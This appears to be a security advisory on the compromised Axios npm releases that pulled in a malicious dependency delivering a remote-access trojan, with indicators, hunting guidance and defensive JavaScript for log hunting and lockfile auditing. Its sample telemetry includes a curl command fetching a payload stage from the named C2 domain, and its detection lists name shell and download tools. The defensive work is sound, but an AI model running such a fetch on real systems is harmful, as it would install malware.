Severity: critical

Supply Chain Compromise Impacts Axios Node Package Manager

A software supply chain compromise affected the Axios npm package: versions 1.14.1 and 0.30.4 were published with a malicious dependency, plain-crypto-js@4.2.1. That dependency downloads multi-stage payloads, including a Remote Access Trojan (RAT), from a known malicious command-and-control (C2) domain.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-04-20

Authors: CISA

Source: CISA

IOCs · 1
  • Domain: sfrclak[.]com, the Command and Control (C2) domain used to download the multi-stage payloads and the Remote Access Trojan (RAT).

Key Takeaways

  • Axios npm versions 1.14.1 and 0.30.4 were compromised via a malicious dependency named plain-crypto-js@4.2.1.
  • The malicious dependency downloads multi-stage payloads, including a Remote Access Trojan (RAT).
  • The malware communicates with the C2 domain sfrclak[.]com.
  • Organizations must immediately downgrade to safe versions (1.14.0 or 0.30.3) and rotate potentially exposed credentials.
  • Hardening npm configuration by setting ignore-scripts=true and min-release-age=7 in .npmrc reduces exposure to attacks of this kind, which rely on install-time scripts in freshly published versions.

Affected Systems

  • Node.js environments
  • CI/CD pipelines
  • Developer machines using Axios npm versions 1.14.1 and 0.30.4

Attack Chain

Threat actors compromised the Axios npm package by injecting a malicious dependency, plain-crypto-js@4.2.1, into versions 1.14.1 and 0.30.4. When a developer or CI/CD pipeline runs npm install or npm update and resolves one of those versions, npm also fetches plain-crypto-js@4.2.1 and runs its install-time lifecycle script. That script downloads multi-stage payloads from the C2 domain sfrclak[.]com and ultimately deploys a Remote Access Trojan (RAT) on the affected machine.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules are provided in the alert, but behavioral monitoring recommendations and IOCs are listed.

Detection Engineering Assessment

  • EDR Visibility: High. EDR solutions can monitor child processes spawned by npm and node, and outbound network connections to known malicious domains.
  • Network Visibility: Medium. Network monitoring can detect outbound connections to the C2 domain, though the payload traffic itself may be encrypted.
  • Detection Difficulty: Moderate. Matching the specific C2 domain is straightforward, but distinguishing malicious npm script execution from legitimate build processes requires baseline tuning.

Required Log Sources

  • Process Creation Logs
  • DNS Query Logs
  • Network Connection Logs

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
  • Look for unexpected child processes spawned by npm or node executables during package installation. | Process Creation | Execution | Medium
  • Search for outbound network connections to known malicious C2 domains originating from developer workstations or CI/CD servers. | Network/DNS | Command and Control | Low
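The two hypotheses above, implemented as an added example over constructed sample telemetry (this is not code from the CISA alert or from any tool it references). The event field names (host, parent, child, cmdline, query) are assumptions rather than a real EDR or DNS log schema; the C2 domain is the alert's IOC. The example also shows the correlation step a hunter would add: a suspicious npm child process on its own is a medium-confidence lead, while the same host also resolving or contacting the C2 domain should be treated as a confirmed RAT install.

```javascript
// Added example, not from the CISA alert: the two hunting hypotheses above, implemented
// over constructed sample telemetry. Event field names (host, parent, child, cmdline,
// query) are assumptions, not a real EDR or DNS log schema.

const C2_DOMAINS = new Set(["sfrclak.com"]);                 // from the alert's IOC list
const PACKAGE_MANAGERS = new Set(["npm", "node", "npx"]);
// Children a dependency install should not normally need to spawn.
const SUSPICIOUS_CHILDREN = new Set(["sh", "bash", "zsh", "cmd.exe", "powershell.exe", "curl", "wget"]);

// Executable name without its path, so "/usr/bin/node" and "node" compare equal.
function basename(p) {
  return p.split(/[\\/]/).pop().toLowerCase();
}

// Lowercase, re-fang "[.]", and drop the trailing dot of a fully-qualified query.
function normalizeDomain(name) {
  return name.trim().toLowerCase().replace(/\[\.\]/g, ".").replace(/\.$/, "");
}

// True for the C2 domain itself and any subdomain of it; "notsfrclak.com" does not match.
function matchesC2(name) {
  const d = normalizeDomain(name);
  for (const c2 of C2_DOMAINS) {
    if (d === c2 || d.endsWith("." + c2)) return true;
  }
  return false;
}

// Hostnames embedded in a command line, e.g. the URL argument of a curl call.
function hostnamesIn(cmdline) {
  return cmdline.match(/(?:[a-z0-9-]+\.)+[a-z]{2,}/gi) || [];
}

// Hypothesis 1: npm/node spawning a shell or download utility. FP risk is medium
// because legitimate lifecycle scripts also run through sh; tune SUSPICIOUS_CHILDREN
// against a baseline of your own build hosts.
function huntSuspiciousChildren(processEvents) {
  return processEvents.filter(e =>
    PACKAGE_MANAGERS.has(basename(e.parent)) && SUSPICIOUS_CHILDREN.has(basename(e.child)));
}

// Hypothesis 2: the C2 domain in a DNS query or in a process command line. FP risk is low.
function huntC2(dnsEvents, processEvents) {
  return {
    dns: dnsEvents.filter(e => matchesC2(e.query)),
    proc: processEvents.filter(e => hostnamesIn(e.cmdline).some(matchesC2)),
  };
}

// Per-host correlation: C2 contact alone is "high", a suspicious child alone is "medium",
// both on one host is "critical" and should be handled as a confirmed RAT install.
function correlate(processEvents, dnsEvents) {
  const findings = {};
  const bucket = host => (findings[host] = findings[host] || { suspiciousChildren: [], c2: [] });
  for (const e of huntSuspiciousChildren(processEvents)) bucket(e.host).suspiciousChildren.push(e);
  const c2 = huntC2(dnsEvents, processEvents);
  for (const e of c2.dns.concat(c2.proc)) bucket(e.host).c2.push(e);
  for (const f of Object.values(findings)) {
    f.severity = f.c2.length && f.suspiciousChildren.length ? "critical"
               : f.c2.length ? "high" : "medium";
  }
  return findings;
}

// Constructed sample telemetry (not real logs): a CI runner that installed the
// trojanised axios, and a developer laptop doing an ordinary TypeScript build.
const sampleProcessEvents = [
  { host: "ci-runner-01", parent: "/usr/bin/node", child: "/bin/sh", cmdline: 'sh -c "node install.js"' },
  { host: "ci-runner-01", parent: "/bin/sh", child: "/usr/bin/curl", cmdline: "curl -s https://sfrclak.com/stage1" },
  { host: "dev-laptop-07", parent: "/usr/bin/node", child: "/usr/bin/node", cmdline: "node node_modules/.bin/tsc -p ." },
  { host: "dev-laptop-07", parent: "/bin/bash", child: "/usr/bin/npm", cmdline: "npm install" },
];
const sampleDnsEvents = [
  { host: "ci-runner-01", query: "registry.npmjs.org" },
  { host: "ci-runner-01", query: "SFRCLAK.COM." },     // case and trailing dot vary by resolver
  { host: "dev-laptop-07", query: "registry.npmjs.org" },
];

console.log(JSON.stringify(correlate(sampleProcessEvents, sampleDnsEvents), null, 2));
```

On the constructed data the CI runner is reported as critical (node spawning sh, plus the C2 domain in both a DNS query and a curl command line) while the laptop, whose node process only spawned another node process, produces no finding. The domain match is deliberately suffix-anchored so that subdomains of the C2 domain are caught without matching unrelated names that merely end in the same string.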

Control Gaps

  • Lack of dependency pinning
  • Execution of untrusted npm lifecycle scripts

Key Behavioral Indicators

  • npm or node processes spawning unusual shells or utilities
  • Anomalous outbound network connections during npm install or update

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Downgrade Axios to known safe versions (1.14.0 or 0.30.3).
  • Delete the node_modules/plain-crypto-js/ directory.
  • Block outbound connections to sfrclak[.]com.
  • Rotate all potentially exposed credentials (VCS tokens, CI/CD secrets, cloud keys, npm tokens, SSH keys).

Infrastructure Hardening

  • Set ignore-scripts=true in the .npmrc configuration file so that npm does not run package lifecycle scripts (preinstall, install, postinstall) during installation. This also disables scripts that legitimate dependencies rely on, such as native builds, so those must be run explicitly where they are needed.
  • Set min-release-age=7 in the .npmrc configuration file so that npm will not resolve versions published less than 7 days ago, giving the ecosystem time to notice and pull a poisoned release. The setting is only honoured by recent npm versions and governs which versions npm resolves, so it complements rather than replaces a committed lockfile.
  • Pin dependencies to exact, known-safe versions and commit the lockfile (package-lock.json), installing in CI with npm ci so the resolved tree cannot drift to a newly published release.
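The Immediate Mitigation and Infrastructure Hardening steps above, turned into an offline audit as an added example (this is not code from the CISA alert or from the axios project). It walks a package-lock.json for the compromised axios and plain-crypto-js versions, checks .npmrc for the two hardening settings, and emits the remediation actions in order. The sample lockfile and .npmrc are constructed; the compromised versions, downgrade targets and .npmrc keys are the ones the alert names. The lockfile key layout and the hasInstallScript field follow npm's v2/v3 lockfile format, and the v1 nested "dependencies" tree is handled as well.

```javascript
// Added example, not code from the CISA alert or the axios project: an offline audit of a
// project's package-lock.json and .npmrc against the versions and settings listed above,
// producing the remediation steps from the alert. The sample lockfile and .npmrc are
// constructed; the compromised versions, downgrade targets and .npmrc keys are the alert's.

const COMPROMISED = {
  axios: new Set(["1.14.1", "0.30.4"]),
  "plain-crypto-js": new Set(["4.2.1"]),
};
const SAFE_AXIOS = { "1.14.1": "1.14.0", "0.30.4": "0.30.3" };   // downgrade targets

// Package name from a v2/v3 lockfile key such as "node_modules/a/node_modules/@s/b".
function nameFromLockKey(key) {
  const i = key.lastIndexOf("node_modules/");
  return i === -1 ? null : key.slice(i + "node_modules/".length);
}

// Every installed {name, version} in a lockfile: the v2/v3 "packages" map, or the nested
// v1 "dependencies" tree.
function* installedPackages(lock) {
  if (lock.packages) {
    for (const [key, meta] of Object.entries(lock.packages)) {
      const name = nameFromLockKey(key);
      if (name && meta.version) yield { name, version: meta.version };
    }
  } else if (lock.dependencies) {
    const walk = function* (deps) {
      for (const [name, meta] of Object.entries(deps)) {
        if (meta.version) yield { name, version: meta.version };
        if (meta.dependencies) yield* walk(meta.dependencies);
      }
    };
    yield* walk(lock.dependencies);
  }
}

// Installed packages that match a compromised name@version from the alert.
function auditLockfile(lock) {
  const hits = [];
  for (const p of installedPackages(lock)) {
    if (COMPROMISED[p.name] && COMPROMISED[p.name].has(p.version)) hits.push(p);
  }
  return hits;
}

// Minimal .npmrc reader: key=value per line, "#" or ";" starts a comment.
function parseNpmrc(text) {
  const cfg = {};
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const eq = line.indexOf("=");
    if (eq !== -1) cfg[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return cfg;
}

// Hardening settings from the alert that are absent or weaker than recommended.
function auditNpmrc(text) {
  const cfg = parseNpmrc(text);
  const missing = [];
  if (cfg["ignore-scripts"] !== "true") missing.push("ignore-scripts=true");
  if (!(Number(cfg["min-release-age"]) >= 7)) missing.push("min-release-age=7");  // days; larger is fine
  return missing;
}

// The alert's immediate-mitigation and hardening steps as an ordered action list:
// remove the malicious package, pin axios to the safe release, rotate secrets, harden .npmrc.
function remediationPlan(lock, npmrcText) {
  const actions = [];
  const hits = auditLockfile(lock);
  for (const h of hits) if (h.name === "plain-crypto-js") actions.push("rm -rf node_modules/plain-crypto-js");
  for (const h of hits) if (h.name === "axios") actions.push(`npm install axios@${SAFE_AXIOS[h.version]} --save-exact`);
  if (hits.length) actions.push("rotate VCS tokens, CI/CD secrets, cloud keys, npm tokens and SSH keys used on this host");
  for (const setting of auditNpmrc(npmrcText)) actions.push(`add "${setting}" to .npmrc`);
  return actions;
}

// Constructed sample inputs (not real project files): a caret range on axios that
// resolved to the poisoned 1.14.1, and an .npmrc that still allows lifecycle scripts.
const sampleLock = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0", dependencies: { axios: "^1.14.0" } },
    "node_modules/axios": { version: "1.14.1", dependencies: { "plain-crypto-js": "4.2.1" } },
    "node_modules/plain-crypto-js": { version: "4.2.1", hasInstallScript: true },
    "node_modules/left-pad": { version: "1.3.0" },
  },
};
const sampleNpmrc = "# constructed example\nregistry=https://registry.npmjs.org/\nignore-scripts=false\n";

console.log(remediationPlan(sampleLock, sampleNpmrc).join("\n"));
```

Two points the plan encodes: the downgrade uses --save-exact so the caret range that pulled in 1.14.1 cannot resolve to it again, and the .npmrc check is applied even when no compromised package is found, since the hardening is meant to stop the next poisoned release rather than this one. Run the npm install step only after ignore-scripts=true is in place, because reinstalling on a host that may already be compromised should not execute any further lifecycle scripts.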

User Protection

  • Mandate phishing-resistant multifactor authentication (MFA) on all developer accounts.

Security Awareness

  • Educate developers on the risks of supply chain attacks and the importance of reviewing package dependencies.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise of Software Dependencies and Development Tools
  • T1105 - Ingress Tool Transfer
  • T1071.001 - Application Layer Protocol: Web Protocols

Additional IOCs

  • Domains:
    • sfrclak[.]com - C2 domain for multi-stage payloads and RAT
  • File Paths:
    • node_modules/plain-crypto-js/ - Directory of the malicious dependency to be deleted during remediation
  • Command Lines:
    • Purpose: Triggering the malicious dependency download and execution | Tools: npm | Stage: Execution | npm install
    • Purpose: Triggering the malicious dependency download and execution | Tools: npm | Stage: Execution | npm update
  • Other:
    • axios@1.14.1 - Compromised Axios version
    • axios@0.30.4 - Compromised Axios version
    • plain-crypto-js@4.2.1 - Malicious injected dependency